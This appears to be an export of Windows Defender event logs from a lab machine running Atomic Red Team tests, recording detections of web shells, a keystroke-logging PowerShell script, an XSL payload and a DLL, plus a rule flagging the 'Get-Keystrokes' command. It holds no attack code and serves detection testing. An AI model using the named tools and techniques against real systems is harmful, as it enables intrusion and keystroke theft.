MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl 1 %%845 1 %%813 2 %%823 0 6 %%811 0x80508023 The program could not find the malware and other potentially unwanted software on this device. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 105 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} 2019-07-18T20:40:16.697Z 2147708292 HackTool:JS/Jsprat 4 High 34 Tool https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 3 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) 1 %%845 1 %%813 8 %%862 0 2 %%809 0x00000000 The operation completed successfully. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 104 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} 2019-07-18T20:41:40.357Z 2147726426 Trojan:Win32/Sehyioa.A!cl 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 3 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll 1 %%845 1 %%813 8 %%862 0 2 %%809 0x00000000 The operation completed successfully. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 103 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} 2019-07-18T20:40:18.385Z 2147683177 Backdoor:ASP/Ace.T 5 Severe 6 Backdoor https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 3 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx 1 %%845 1 %%813 0 %%822 0 2 %%809 0x00000000 The operation completed successfully. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 102 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} 2019-07-18T20:40:16.697Z 2147708292 HackTool:JS/Jsprat 4 High 34 Tool https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) 1 %%845 1 %%813 8 %%862 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1117," 1117 0 4 0 0 0x8000000000000000 101 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {511224D4-1EB4-47B9-BC4A-37E21F923FED} 2019-07-18T20:40:00.580Z 2147725349 Trojan:PowerShell/Powersploit.M 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 103 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 1 %%845 1 %%813 0 %%822 0 2 %%809 0x80508023 The program could not find the malware and other potentially unwanted software on this device. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 101 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {511224D4-1EB4-47B9-BC4A-37E21F923FED} 2019-07-18T20:40:00.580Z 2147725349 Trojan:PowerShell/Powersploit.M 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 103 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 1 %%845 1 %%813 0 %%822 0 2 %%809 0x80508023 The program could not find the malware and other potentially unwanted software on this device. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 95 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} 2019-07-18T20:41:40.357Z 2147726426 Trojan:Win32/Sehyioa.A!cl 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll 1 %%845 1 %%813 8 %%862 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 76 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} 2019-07-18T20:40:18.385Z 2147683177 Backdoor:ASP/Ace.T 5 Severe 6 Backdoor https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx 1 %%845 1 %%813 0 %%822 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 75 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} 2019-07-18T20:40:16.697Z 2147708292 HackTool:JS/Jsprat 4 High 34 Tool https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) 1 %%845 1 %%813 8 %%862 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 48 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {8791B1FB-0FE7-412E-B084-524CB5A221F3} 2019-07-18T20:40:13.775Z 2147735426 Trojan:XML/Exeselrun.gen!A 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl 1 %%845 1 %%813 2 %%823 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1116," 1116 0 3 0 0 0x8000000000000000 37 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {511224D4-1EB4-47B9-BC4A-37E21F923FED} 2019-07-18T20:40:00.580Z 2147725349 Trojan:PowerShell/Powersploit.M 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 1 %%845 1 %%813 0 %%822 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 37 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {511224D4-1EB4-47B9-BC4A-37E21F923FED} 2019-07-18T20:40:00.580Z 2147725349 Trojan:PowerShell/Powersploit.M 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 1 %%845 1 %%813 0 %%822 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational